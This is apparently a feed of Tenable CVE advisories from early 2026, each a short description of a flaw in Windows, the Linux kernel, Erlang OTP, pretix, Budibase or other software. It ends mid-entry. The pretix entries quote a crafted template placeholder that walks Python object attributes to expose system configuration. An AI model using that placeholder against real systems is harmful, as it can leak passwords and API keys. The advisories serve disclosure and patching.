]]> https://www.tenable.com/cve/CVE-2026-25187 https://www.tenable.com/cve/CVE-2026-25187 Tue, 10 Mar 2026 18:18:35 GMT High Severity

Description

Improper link resolution before file access ('link following') in Winlogon allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25187

]]> https://www.tenable.com/cve/CVE-2026-25186 https://www.tenable.com/cve/CVE-2026-25186 Tue, 10 Mar 2026 18:18:35 GMT Medium Severity

Description

Exposure of sensitive information to an unauthorized actor in Windows Accessibility Infrastructure (ATBroker.exe) allows an authorized attacker to disclose information locally.

Read more at https://www.tenable.com/cve/CVE-2026-25186

]]> https://www.tenable.com/cve/CVE-2026-25185 https://www.tenable.com/cve/CVE-2026-25185 Tue, 10 Mar 2026 18:18:34 GMT Medium Severity

Description

Exposure of sensitive information to an unauthorized actor in Windows Shell Link Processing allows an unauthorized attacker to perform spoofing over a network.

Read more at https://www.tenable.com/cve/CVE-2026-25185

]]> https://www.tenable.com/cve/CVE-2026-25181 https://www.tenable.com/cve/CVE-2026-25181 Tue, 10 Mar 2026 18:18:34 GMT High Severity

Description

Out-of-bounds read in Windows GDI+ allows an unauthorized attacker to disclose information over a network.

Read more at https://www.tenable.com/cve/CVE-2026-25181

]]> https://www.tenable.com/cve/CVE-2026-25180 https://www.tenable.com/cve/CVE-2026-25180 Tue, 10 Mar 2026 18:18:34 GMT Medium Severity

Description

Out-of-bounds read in Microsoft Graphics Component allows an unauthorized attacker to disclose information locally.

Read more at https://www.tenable.com/cve/CVE-2026-25180

]]> https://www.tenable.com/cve/CVE-2026-25179 https://www.tenable.com/cve/CVE-2026-25179 Tue, 10 Mar 2026 18:18:33 GMT High Severity

Description

Improper validation of specified type of input in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25179

]]> https://www.tenable.com/cve/CVE-2026-25178 https://www.tenable.com/cve/CVE-2026-25178 Tue, 10 Mar 2026 18:18:33 GMT High Severity

Description

Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25178

]]> https://www.tenable.com/cve/CVE-2026-25177 https://www.tenable.com/cve/CVE-2026-25177 Tue, 10 Mar 2026 18:18:33 GMT High Severity

Description

Improper restriction of names for files and other resources in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network.

Read more at https://www.tenable.com/cve/CVE-2026-25177

]]> https://www.tenable.com/cve/CVE-2026-25176 https://www.tenable.com/cve/CVE-2026-25176 Tue, 10 Mar 2026 18:18:32 GMT High Severity

Description

Improper access control in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25176

]]> https://www.tenable.com/cve/CVE-2026-25175 https://www.tenable.com/cve/CVE-2026-25175 Tue, 10 Mar 2026 18:18:32 GMT High Severity

Description

Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25175

]]> https://www.tenable.com/cve/CVE-2026-25174 https://www.tenable.com/cve/CVE-2026-25174 Tue, 10 Mar 2026 18:18:32 GMT High Severity

Description

Out-of-bounds read in Windows Extensible File Allocation allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25174

]]> https://www.tenable.com/cve/CVE-2026-25173 https://www.tenable.com/cve/CVE-2026-25173 Tue, 10 Mar 2026 18:18:31 GMT High Severity

Description

Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-25173

]]> https://www.tenable.com/cve/CVE-2026-25172 https://www.tenable.com/cve/CVE-2026-25172 Tue, 10 Mar 2026 18:18:31 GMT High Severity

Description

Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-25172

]]> https://www.tenable.com/cve/CVE-2026-25171 https://www.tenable.com/cve/CVE-2026-25171 Tue, 10 Mar 2026 18:18:31 GMT High Severity

Description

Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25171

]]> https://www.tenable.com/cve/CVE-2026-25170 https://www.tenable.com/cve/CVE-2026-25170 Tue, 10 Mar 2026 18:18:31 GMT High Severity

Description

Use after free in Windows Hyper-V allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25170

]]> https://www.tenable.com/cve/CVE-2026-25169 https://www.tenable.com/cve/CVE-2026-25169 Tue, 10 Mar 2026 18:18:30 GMT Medium Severity

Description

Divide by zero in Microsoft Graphics Component allows an unauthorized attacker to deny service locally.

Read more at https://www.tenable.com/cve/CVE-2026-25169

]]> https://www.tenable.com/cve/CVE-2026-25168 https://www.tenable.com/cve/CVE-2026-25168 Tue, 10 Mar 2026 18:18:30 GMT Medium Severity

Description

Null pointer dereference in Microsoft Graphics Component allows an unauthorized attacker to deny service locally.

Read more at https://www.tenable.com/cve/CVE-2026-25168

]]> https://www.tenable.com/cve/CVE-2026-25167 https://www.tenable.com/cve/CVE-2026-25167 Tue, 10 Mar 2026 18:18:30 GMT High Severity

Description

Use after free in Microsoft Brokering File System allows an unauthorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25167

]]> https://www.tenable.com/cve/CVE-2026-25166 https://www.tenable.com/cve/CVE-2026-25166 Tue, 10 Mar 2026 18:18:29 GMT High Severity

Description

Deserialization of untrusted data in Windows System Image Manager allows an authorized attacker to execute code locally.

Read more at https://www.tenable.com/cve/CVE-2026-25166

]]> https://www.tenable.com/cve/CVE-2026-25165 https://www.tenable.com/cve/CVE-2026-25165 Tue, 10 Mar 2026 18:18:29 GMT High Severity

Description

Null pointer dereference in Windows Performance Counters allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-25165

]]> https://www.tenable.com/cve/CVE-2026-25076 https://www.tenable.com/cve/CVE-2026-25076 Fri, 13 Mar 2026 19:54:18 GMT High Severity

Description

Anchore Enterprise versions before 5.25.1 contain an SQL injection vulnerability in the GraphQL Reports API. An authenticated attacker that is able to access the GraphQL API could execute arbitrary SQL instructions resulting in modifications to the data contained in the Anchore Enterprise database.

Read more at https://www.tenable.com/cve/CVE-2026-25076

]]> https://www.tenable.com/cve/CVE-2026-25048 https://www.tenable.com/cve/CVE-2026-25048 Thu, 05 Mar 2026 16:16:15 GMT High Severity

Description

xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.

Read more at https://www.tenable.com/cve/CVE-2026-25048

]]> https://www.tenable.com/cve/CVE-2026-25045 https://www.tenable.com/cve/CVE-2026-25045 Mon, 09 Mar 2026 21:16:15 GMT High Severity

Description

Budibase is a low code platform for creating internal tools, workflows, and admin panels. This issue is a combination of Vertical Privilege Escalation and IDOR (Insecure Direct Object Reference) due to missing server-side RBAC checks in the /api/global/users endpoints. A Creator-level user, who should have no permissions to manage users or organizational roles, can instead promote an App Viewer to Tenant Admin, demote a Tenant Admin to App Viewer, or modify the Owner’s account details and all orders (e.g., change name). This is because the API accepts these actions without validating the requesting role, a Creator can replay Owner-only requests using their own session tokens. This leads to full tenant compromise.

Read more at https://www.tenable.com/cve/CVE-2026-25045

]]> https://www.tenable.com/cve/CVE-2026-25041 https://www.tenable.com/cve/CVE-2026-25041 Mon, 09 Mar 2026 20:16:07 GMT High Severity

Description

Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.23.22 and earlier, the PostgreSQL integration constructs shell commands using user-controlled configuration values (database name, host, password, etc.) without proper sanitization. The password and other connection parameters are directly interpolated into a shell command. This affects packages/server/src/integrations/postgres.ts.

Read more at https://www.tenable.com/cve/CVE-2026-25041

]]> https://www.tenable.com/cve/CVE-2026-2451 https://www.tenable.com/cve/CVE-2026-2451 Mon, 16 Feb 2026 11:15:56 GMT Critical Severity

Description

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for this plugin. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg file.

Read more at https://www.tenable.com/cve/CVE-2026-2451

]]> https://www.tenable.com/cve/CVE-2026-24297 https://www.tenable.com/cve/CVE-2026-24297 Tue, 10 Mar 2026 18:18:27 GMT Medium Severity

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Kerberos allows an unauthorized attacker to bypass a security feature over a network.

Read more at https://www.tenable.com/cve/CVE-2026-24297

]]> https://www.tenable.com/cve/CVE-2026-24296 https://www.tenable.com/cve/CVE-2026-24296 Tue, 10 Mar 2026 18:18:26 GMT High Severity

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Device Association Service allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24296

]]> https://www.tenable.com/cve/CVE-2026-24295 https://www.tenable.com/cve/CVE-2026-24295 Tue, 10 Mar 2026 18:18:20 GMT High Severity

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Device Association Service allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24295

]]> https://www.tenable.com/cve/CVE-2026-24294 https://www.tenable.com/cve/CVE-2026-24294 Tue, 10 Mar 2026 18:18:20 GMT High Severity

Description

Improper authentication in Windows SMB Server allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24294

]]> https://www.tenable.com/cve/CVE-2026-24293 https://www.tenable.com/cve/CVE-2026-24293 Tue, 10 Mar 2026 18:18:20 GMT High Severity

Description

Null pointer dereference in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24293

]]> https://www.tenable.com/cve/CVE-2026-24292 https://www.tenable.com/cve/CVE-2026-24292 Tue, 10 Mar 2026 18:18:20 GMT High Severity

Description

Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24292

]]> https://www.tenable.com/cve/CVE-2026-24291 https://www.tenable.com/cve/CVE-2026-24291 Tue, 10 Mar 2026 18:18:19 GMT High Severity

Description

Incorrect permission assignment for critical resource in Windows Accessibility Infrastructure (ATBroker.exe) allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24291

]]> https://www.tenable.com/cve/CVE-2026-24290 https://www.tenable.com/cve/CVE-2026-24290 Tue, 10 Mar 2026 18:18:19 GMT High Severity

Description

Improper access control in Windows Projected File System allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24290

]]> https://www.tenable.com/cve/CVE-2026-24289 https://www.tenable.com/cve/CVE-2026-24289 Tue, 10 Mar 2026 18:18:19 GMT High Severity

Description

Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24289

]]> https://www.tenable.com/cve/CVE-2026-24288 https://www.tenable.com/cve/CVE-2026-24288 Tue, 10 Mar 2026 18:18:18 GMT Medium Severity

Description

Heap-based buffer overflow in Windows Mobile Broadband allows an unauthorized attacker to execute code with a physical attack.

Read more at https://www.tenable.com/cve/CVE-2026-24288

]]> https://www.tenable.com/cve/CVE-2026-24287 https://www.tenable.com/cve/CVE-2026-24287 Tue, 10 Mar 2026 18:18:18 GMT High Severity

Description

External control of file name or path in Windows Kernel allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24287

]]> https://www.tenable.com/cve/CVE-2026-24285 https://www.tenable.com/cve/CVE-2026-24285 Tue, 10 Mar 2026 18:18:18 GMT High Severity

Description

Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24285

]]> https://www.tenable.com/cve/CVE-2026-24283 https://www.tenable.com/cve/CVE-2026-24283 Tue, 10 Mar 2026 18:18:18 GMT High Severity

Description

Heap-based buffer overflow in Windows File Server allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-24283

]]> https://www.tenable.com/cve/CVE-2026-24282 https://www.tenable.com/cve/CVE-2026-24282 Tue, 10 Mar 2026 18:18:17 GMT Medium Severity

Description

Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.

Read more at https://www.tenable.com/cve/CVE-2026-24282

]]> https://www.tenable.com/cve/CVE-2026-2415 https://www.tenable.com/cve/CVE-2026-2415 Mon, 16 Feb 2026 11:15:56 GMT Critical Severity

Description

Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs: * It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject. * Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is {invoice_company}, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. However, we also consider this scenario very unlikely under typical conditions. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/ file.

Read more at https://www.tenable.com/cve/CVE-2026-2415

]]> https://www.tenable.com/cve/CVE-2026-24125 https://www.tenable.com/cve/CVE-2026-24125 Thu, 12 Mar 2026 17:16:39 GMT Medium Severity

Description

Tina is a headless content management system. Prior to 2.1.2, TinaCMS allows users to create, update, and delete content documents using relative file paths (relativePath, newRelativePath) via GraphQL mutations. Under certain conditions, these paths are combined with the collection path using path.join() without validating that the resolved path remains within the collection root directory. Because path.join() does not prevent directory traversal, paths containing ../ sequences can escape the intended directory boundary. This vulnerability is fixed in 2.1.2.

Read more at https://www.tenable.com/cve/CVE-2026-24125

]]> https://www.tenable.com/cve/CVE-2026-24097 https://www.tenable.com/cve/CVE-2026-24097 Fri, 13 Mar 2026 19:54:16 GMT Medium Severity

Description

Improper permission enforcement in Checkmk versions 2.4.0 before 2.4.0p23, 2.3.0 before 2.3.0p43, and 2.2.0 (EOL) allows authenticated users to enumerate existing hosts by observing different HTTP response codes in agent-receiver/register_existing endpoint, which could lead to information disclosure.

Read more at https://www.tenable.com/cve/CVE-2026-24097

]]> https://www.tenable.com/cve/CVE-2026-24018 https://www.tenable.com/cve/CVE-2026-24018 Tue, 10 Mar 2026 18:18:17 GMT High Severity

Description

A UNIX symbolic link (Symlink) following vulnerability in Fortinet FortiClientLinux 7.4.0 through 7.4.4, FortiClientLinux 7.2.2 through 7.2.12 may allow a local and unprivileged user to escalate their privileges to root.

Read more at https://www.tenable.com/cve/CVE-2026-24018

]]> https://www.tenable.com/cve/CVE-2026-23943 https://www.tenable.com/cve/CVE-2026-23943 Fri, 13 Mar 2026 19:54:15 GMT Medium Severity

Description

Improper Handling of Highly Compressed Data (Compression Bomb) vulnerability in Erlang OTP ssh (ssh_transport modules) allows Denial of Service via Resource Depletion. The SSH transport layer advertises legacy zlib compression by default and inflates attacker-controlled payloads pre-authentication without any size limit, enabling reliable memory exhaustion DoS. Two compression algorithms are affected: * zlib: Activates immediately after key exchange, enabling unauthenticated attacks * zlib@openssh.com: Activates post-authentication, enabling authenticated attacks Each SSH packet can decompress ~255 MB from 256 KB of wire data (1029:1 amplification ratio). Multiple packets can rapidly exhaust available memory, causing OOM kills in memory-constrained environments. This vulnerability is associated with program files lib/ssh/src/ssh_transport.erl and program routines ssh_transport:decompress/2, ssh_transport:handle_packet_part/4. This issue affects OTP from OTP 17.0 until OTP 28.4.1, 27.3.4.9 and 26.2.5.18 corresponding to ssh from 3.0.1 until 5.5.1, 5.2.11.6 and 5.1.4.14.

Read more at https://www.tenable.com/cve/CVE-2026-23943

]]> https://www.tenable.com/cve/CVE-2026-23942 https://www.tenable.com/cve/CVE-2026-23942 Fri, 13 Mar 2026 19:54:15 GMT Medium Severity

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Erlang OTP (ssh_sftpd module) allows Path Traversal. This vulnerability is associated with program files lib/ssh/src/ssh_sftpd.erl and program routines ssh_sftpd:is_within_root/2. The SFTP server uses string prefix matching via lists:prefix/2 rather than proper path component validation when checking if a path is within the configured root directory. This allows authenticated users to access sibling directories that share a common name prefix with the configured root directory. For example, if root is set to /home/user1, paths like /home/user10 or /home/user1_backup would incorrectly be considered within the root. This issue affects OTP from OTP 17.0 until OTP 28.4.1, OTP 27.3.4.9 and OTP 26.2.5.18, corresponding to ssh from 3.0.1 until 5.5.1, 5.2.11.6 and 5.1.4.14.

Read more at https://www.tenable.com/cve/CVE-2026-23942

]]> https://www.tenable.com/cve/CVE-2026-23941 https://www.tenable.com/cve/CVE-2026-23941 Fri, 13 Mar 2026 19:54:15 GMT High Severity

Description

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in Erlang OTP (inets httpd module) allows HTTP Request Smuggling. This vulnerability is associated with program files lib/inets/src/http_server/httpd_request.erl and program routines httpd_request:parse_headers/7. The server does not reject or normalize duplicate Content-Length headers. The earliest Content-Length in the request is used for body parsing while common reverse proxies (nginx, Apache httpd, Envoy) honor the last Content-Length value. This violates RFC 9112 Section 6.3 and allows front-end/back-end desynchronization, leaving attacker-controlled bytes queued as the start of the next request. This issue affects OTP from OTP 17.0 until OTP 28.4.1, OTP 27.3.4.9 and OTP 26.2.5.18, corresponding to inets from 5.10 until 9.6.1, 9.3.2.3 and 9.1.0.5.

Read more at https://www.tenable.com/cve/CVE-2026-23941

]]> https://www.tenable.com/cve/CVE-2026-23940 https://www.tenable.com/cve/CVE-2026-23940 Fri, 13 Mar 2026 19:54:14 GMT High Severity

Description

Uncontrolled Resource Consumption vulnerability in hexpm hexpm/hexpm allows Excessive Allocation. Publishing an oversized package can cause Hex.pm to run out of memory while extracting the uploaded package tarball. This can terminate the affected application instance and result in a denial of service for package publishing and potentially other package-processing functionality. This issue affects hexpm: before 495f01607d3eae4aed7ad09b2f54f31ec7a7df01; hex.pm: before 2026-03-10.

Read more at https://www.tenable.com/cve/CVE-2026-23940

]]> https://www.tenable.com/cve/CVE-2026-23907 https://www.tenable.com/cve/CVE-2026-23907 Tue, 10 Mar 2026 18:18:16 GMT Medium Severity

Description

This issue affects the ExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.35, from 3.0.0 through 3.0.6. The ExtractEmbeddedFiles example contains a path traversal vulnerability (CWE-22) because the filename that is obtained from PDComplexFileSpecification.getFilename() is appended to the extraction path. Users who have copied this example into their production code should review it to ensure that the extraction path is acceptable. The example has been changed accordingly, now the initial path and the extraction paths are converted into canonical paths and it is verified that extraction path contains the initial path. The documentation has also been adjusted.

Read more at https://www.tenable.com/cve/CVE-2026-23907

]]> https://www.tenable.com/cve/CVE-2026-23877 https://www.tenable.com/cve/CVE-2026-23877 Mon, 19 Jan 2026 21:15:52 GMT Medium Severity

Description

Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue.

Read more at https://www.tenable.com/cve/CVE-2026-23877

]]> https://www.tenable.com/cve/CVE-2026-23744 https://www.tenable.com/cve/CVE-2026-23744 Fri, 16 Jan 2026 20:15:51 GMT Critical Severity

Description

MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.

Read more at https://www.tenable.com/cve/CVE-2026-23744

]]> https://www.tenable.com/cve/CVE-2026-23674 https://www.tenable.com/cve/CVE-2026-23674 Tue, 10 Mar 2026 18:18:16 GMT High Severity

Description

Improper resolution of path equivalence in Windows MapUrlToZone allows an unauthorized attacker to bypass a security feature over a network.

Read more at https://www.tenable.com/cve/CVE-2026-23674

]]> https://www.tenable.com/cve/CVE-2026-23673 https://www.tenable.com/cve/CVE-2026-23673 Tue, 10 Mar 2026 18:18:16 GMT High Severity

Description

Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-23673

]]> https://www.tenable.com/cve/CVE-2026-23672 https://www.tenable.com/cve/CVE-2026-23672 Tue, 10 Mar 2026 18:18:15 GMT High Severity

Description

Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability

Read more at https://www.tenable.com/cve/CVE-2026-23672

]]> https://www.tenable.com/cve/CVE-2026-23671 https://www.tenable.com/cve/CVE-2026-23671 Tue, 10 Mar 2026 18:18:15 GMT High Severity

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth RFCOM Protocol Driver allows an authorized attacker to elevate privileges locally.

Read more at https://www.tenable.com/cve/CVE-2026-23671

]]> https://www.tenable.com/cve/CVE-2026-23669 https://www.tenable.com/cve/CVE-2026-23669 Tue, 10 Mar 2026 18:18:15 GMT High Severity

Description

Use after free in Windows Print Spooler Components allows an authorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-23669

]]> https://www.tenable.com/cve/CVE-2026-23654 https://www.tenable.com/cve/CVE-2026-23654 Tue, 10 Mar 2026 18:18:13 GMT High Severity

Description

Dependency on vulnerable third-party component in GitHub Repo: zero-shot-scfoundation allows an unauthorized attacker to execute code over a network.

Read more at https://www.tenable.com/cve/CVE-2026-23654

]]> https://www.tenable.com/cve/CVE-2026-23525 https://www.tenable.com/cve/CVE-2026-23525 Sun, 18 Jan 2026 23:15:48 GMT High Severity

Description

1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.

Read more at https://www.tenable.com/cve/CVE-2026-23525

]]> https://www.tenable.com/cve/CVE-2026-23490 https://www.tenable.com/cve/CVE-2026-23490 Fri, 16 Jan 2026 19:16:19 GMT High Severity

Description

pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.

Read more at https://www.tenable.com/cve/CVE-2026-23490

]]> https://www.tenable.com/cve/CVE-2026-23227 https://www.tenable.com/cve/CVE-2026-23227 Wed, 18 Feb 2026 16:22:32 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: use ctx->lock to protect struct vidi_context member variables related to memory alloc/free Exynos Virtual Display driver performs memory alloc/free operations without lock protection, which easily causes concurrency problem. For example, use-after-free can occur in race scenario like this: ``` CPU0 CPU1 CPU2 ---- ---- ---- vidi_connection_ioctl() if (vidi->connection) // true drm_edid = drm_edid_alloc(); // alloc drm_edid ... ctx->raw_edid = drm_edid; ... drm_mode_getconnector() drm_helper_probe_single_connector_modes() vidi_get_modes() if (ctx->raw_edid) // true drm_edid_dup(ctx->raw_edid); if (!drm_edid) // false ... vidi_connection_ioctl() if (vidi->connection) // false drm_edid_free(ctx->raw_edid); // free drm_edid ... drm_edid_alloc(drm_edid->edid) kmemdup(edid); // UAF!! ... ``` To prevent these vulns, at least in vidi_context, member variables related to memory alloc/free should be protected with ctx->lock.

Read more at https://www.tenable.com/cve/CVE-2026-23227

]]> https://www.tenable.com/cve/CVE-2026-23226 https://www.tenable.com/cve/CVE-2026-23226 Wed, 18 Feb 2026 16:22:32 GMT High Severity

Description

In the Linux kernel, the following vulnerability has been resolved: ksmbd: add chann_lock to protect ksmbd_chann_list xarray ksmbd_chann_list xarray lacks synchronization, allowing use-after-free in multi-channel sessions (between lookup_chann_list() and ksmbd_chann_del). Adds rw_semaphore chann_lock to struct ksmbd_session and protects all xa_load/xa_store/xa_erase accesses.

Read more at https://www.tenable.com/cve/CVE-2026-23226

]]> https://www.tenable.com/cve/CVE-2026-23069 https://www.tenable.com/cve/CVE-2026-23069 Wed, 04 Feb 2026 17:16:17 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix potential underflow in virtio_transport_get_credit() The credit calculation in virtio_transport_get_credit() uses unsigned arithmetic: ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt); If the peer shrinks its advertised buffer (peer_buf_alloc) while bytes are in flight, the subtraction can underflow and produce a large positive value, potentially allowing more data to be queued than the peer can handle. Reuse virtio_transport_has_space() which already handles this case and add a comment to make it clear why we are doing that. [Stefano: use virtio_transport_has_space() instead of duplicating the code] [Stefano: tweak the commit message]

Read more at https://www.tenable.com/cve/CVE-2026-23069

]]> https://www.tenable.com/cve/CVE-2026-23068 https://www.tenable.com/cve/CVE-2026-23068 Wed, 04 Feb 2026 17:16:17 GMT High Severity

Description

In the Linux kernel, the following vulnerability has been resolved: spi: spi-sprd-adi: Fix double free in probe error path The driver currently uses spi_alloc_host() to allocate the controller but registers it using devm_spi_register_controller(). If devm_register_restart_handler() fails, the code jumps to the put_ctlr label and calls spi_controller_put(). However, since the controller was registered via a devm function, the device core will automatically call spi_controller_put() again when the probe fails. This results in a double-free of the spi_controller structure. Fix this by switching to devm_spi_alloc_host() and removing the manual spi_controller_put() call.

Read more at https://www.tenable.com/cve/CVE-2026-23068

]]> https://www.tenable.com/cve/CVE-2026-23067 https://www.tenable.com/cve/CVE-2026-23067 Wed, 04 Feb 2026 17:16:17 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: iommu/io-pgtable-arm: fix size_t signedness bug in unmap path __arm_lpae_unmap() returns size_t but was returning -ENOENT (negative error code) when encountering an unmapped PTE. Since size_t is unsigned, -ENOENT (typically -2) becomes a huge positive value (0xFFFFFFFFFFFFFFFE on 64-bit systems). This corrupted value propagates through the call chain: __arm_lpae_unmap() returns -ENOENT as size_t -> arm_lpae_unmap_pages() returns it -> __iommu_unmap() adds it to iova address -> iommu_pgsize() triggers BUG_ON due to corrupted iova This can cause IOVA address overflow in __iommu_unmap() loop and trigger BUG_ON in iommu_pgsize() from invalid address alignment. Fix by returning 0 instead of -ENOENT. The WARN_ON already signals the error condition, and returning 0 (meaning "nothing unmapped") is the correct semantic for size_t return type. This matches the behavior of other io-pgtable implementations (io-pgtable-arm-v7s, io-pgtable-dart) which return 0 on error conditions.

Read more at https://www.tenable.com/cve/CVE-2026-23067

]]> https://www.tenable.com/cve/CVE-2026-23066 https://www.tenable.com/cve/CVE-2026-23066 Wed, 04 Feb 2026 17:16:17 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix recvmsg() unconditional requeue If rxrpc_recvmsg() fails because MSG_DONTWAIT was specified but the call at the front of the recvmsg queue already has its mutex locked, it requeues the call - whether or not the call is already queued. The call may be on the queue because MSG_PEEK was also passed and so the call was not dequeued or because the I/O thread requeued it. The unconditional requeue may then corrupt the recvmsg queue, leading to things like UAFs or refcount underruns. Fix this by only requeuing the call if it isn't already on the queue - and moving it to the front if it is already queued. If we don't queue it, we have to put the ref we obtained by dequeuing it. Also, MSG_PEEK doesn't dequeue the call so shouldn't call rxrpc_notify_socket() for the call if we didn't use up all the data on the queue, so fix that also.

Read more at https://www.tenable.com/cve/CVE-2026-23066

]]> https://www.tenable.com/cve/CVE-2026-23065 https://www.tenable.com/cve/CVE-2026-23065 Wed, 04 Feb 2026 17:16:17 GMT Medium Severity

Description

In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd: Fix memory leak in wbrf_record() The tmp buffer is allocated using kcalloc() but is not freed if acpi_evaluate_dsm() fails. This causes a memory leak in the error path. Fix this by explicitly freeing the tmp buffer in the error handling path of acpi_evaluate_dsm().

Read more at https://www.tenable.com/cve/CVE-2026-23065

]]> https://www.tenable.com/cve/CVE-2026-23064 https://www.tenable.com/cve/CVE-2026-23064 Wed, 04 Feb 2026 17:16:17 GMT Medium Severity

Description

